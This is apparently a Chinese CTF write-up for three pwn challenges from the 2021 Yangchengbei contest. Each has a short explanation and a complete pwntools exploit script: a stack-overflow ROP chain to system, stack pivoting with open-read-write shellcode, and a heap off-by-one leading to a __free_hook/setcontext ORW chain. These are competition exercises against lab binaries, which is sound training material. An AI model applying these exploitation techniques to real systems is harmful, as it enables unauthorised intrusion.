2021羊城杯pwn部分wp

前言:

羊城杯的how2heap没做出来, rctf也爆零了, 哎, 颓了

BabyRop:

最基础的栈溢出rop链, 直接贴exp了:

from pwn import *

#p=process('./BabyRop')
p=remote('192.168.41.23', 11000)
context.log_level='debug'
sh=0x804c029
system=0x80490a0
#gdb.attach(p,'b *0x804926a')

p.sendline('a'*0x28+'b'*4+p32(system)+p32(0)+p32(sh))
p.interactive()

nologin:

admin中存在溢出覆盖rbp和返回地址, 返回地址+8处, 在返回地址写上read函数+8处写call rsi即可迁移, 然后构造orw即可

from pwn import *
import sys
context.log_level = "debug"
elf=ELF('./nologin')
#p=process('./nologin')
p=remote('192.168.41.23',40001)
context.binary=elf

ru = lambda x : p.recvuntil(x)
sn = lambda x : p.send(x)
rl = lambda : p.recvline()
sl = lambda x : p.sendline(x)
rv = lambda x : p.recv(x)
sa = lambda a,b : p.sendafter(a,b)
sla = lambda a,b : p.sendlineafter(a, b)

def debugf(b=0):
    if debug:
        if b:
            gdb.attach(p,"b *{b}\n".format(b = hex(b))+"set follow-fork-mode parent\n")
        else:
            gdb.attach(p)


ru('input>>')
sl('2')
#debugf(0x40186b)
ru('>password: ')

rdi = 0x0000000000401173
sh = 0x000000000060204b
system = 0x400E58
buf = 0x0602060+0x100
call_rsi=0x000000000040186b
pay = p32(0x602101)+'\x00' +p64(0x602030+0x28)+ p64(elf.plt['read'])+p64(call_rsi)

shellcode=asm('''
              xor rax, rax;
              push r11;
              pop rdx;
              mov rsi, 0x602100;
              syscall;
              add rsi, 28;
              jmp rsi;
              ''')
sl(pay)
print hex(len(shellcode))
sl(shellcode)

shellcode1=asm('''
               xor rax, rax;
               mov rax, 2;
               sub rsi, 16;
               mov rdi, rsi;
               xor rsi, rsi;
               syscall;

               mov rdi, rax;
               xor rax, rax;
               mov rsi, 0x602300;
               mov rdx, 0x80;
               syscall;
               
               mov rax, 1;
               mov rdi, 1;
               syscall;
               ''')
sl('b'*11+'./flag\x00\x00'*3+shellcode1)
p.interactive()

Whats your name:

存在obo可以导致堆块重叠, 之后控制节点指针即可造成任意写, 后面泄露完libc用setcontext控制寄存器跳转到写好的orwshellcode上就行了

from pwn import *

#p=process('./name')
elf=ELF('./name')
p=remote('192.168.41.23',9999)
context.log_level='debug'
libc=ELF('./libc.so.6')
context.binary=elf

def menu(id):
        p.recvuntil('5.exit')
	p.sendline(str(id))

def add(size):
	menu(1)
        p.recvuntil('name size:\n')
	p.sendline(str(size))

def edit(id,name):
	menu(2)
        p.recvuntil('index:\n')
	p.sendline(str(id))
        p.recvuntil('name:\n')
	p.sendline(str(name))

def show(id):
	menu(3)
        p.recvuntil('index:\n')
	p.sendline(str(id))

def delete(id):
	menu(4)
        p.recvuntil('index:\n')
	p.sendline(str(id))

add(0xe8)
show(0)

libc_base=u64(p.recvuntil("\x7f")[-6:].ljust(8,"\x00"))+0x7ff8c20fb000-0x7ff8c24bfb78
success('libc_base:'+hex(libc_base))

add(0x70)
show(1)
heap=u64(p.recv(6).ljust(8,'\x00'))
log.success('heap addr:'+hex(heap))
add(0xf0)
add(0x38)
add(0xf0)
add(0x30)
delete(2)
edit(3,'a'*0x30+p64(0x140))
delete(4)
add(0xf0)
add(0x60)
add(0x20)

open=libc_base+libc.sym['open']
read=libc_base+libc.sym['read']
write=libc_base+libc.sym['write']
ret=0x0000000000000937+libc_base
pop_rdi=0x0000000000021112+libc_base
pop_rsi=0x00000000000202f8+libc_base
pop_rdx=0x0000000000001b92+libc_base

flag_addr=heap+0x55737989b3e0-0x55737989b570
setcontext=libc_base+libc.sym["setcontext"]+53
rop=heap-0x561c6dee4570+0x0000561c6dee4d90
edit(1,'/flag\x00\x00')
edit(3,'aaaaaaaa'+p64(libc_base+libc.sym['__free_hook']))
edit(6,p64(setcontext))
add(0x100)#7
success("rop:"+hex(rop))
payload=p64(pop_rdi)+p64(flag_addr)+p64(pop_rsi)+p64(0)+p64(open)
payload+=p64(pop_rdi)+p64(3)+p64(pop_rsi)+p64(rop+0x500)+p64(pop_rdx)+p64(0x40)+p64(read)
payload+=p64(pop_rdi)+p64(1)+p64(pop_rsi)+p64(rop+0x500)+p64(pop_rdx)+p64(0x40)+p64(write)
edit(7,'a'*8+payload)

frame = SigreturnFrame()
frame.rsp = rop+8
frame.rip = ret

edit(0,frame)
delete(0)


p.interactive()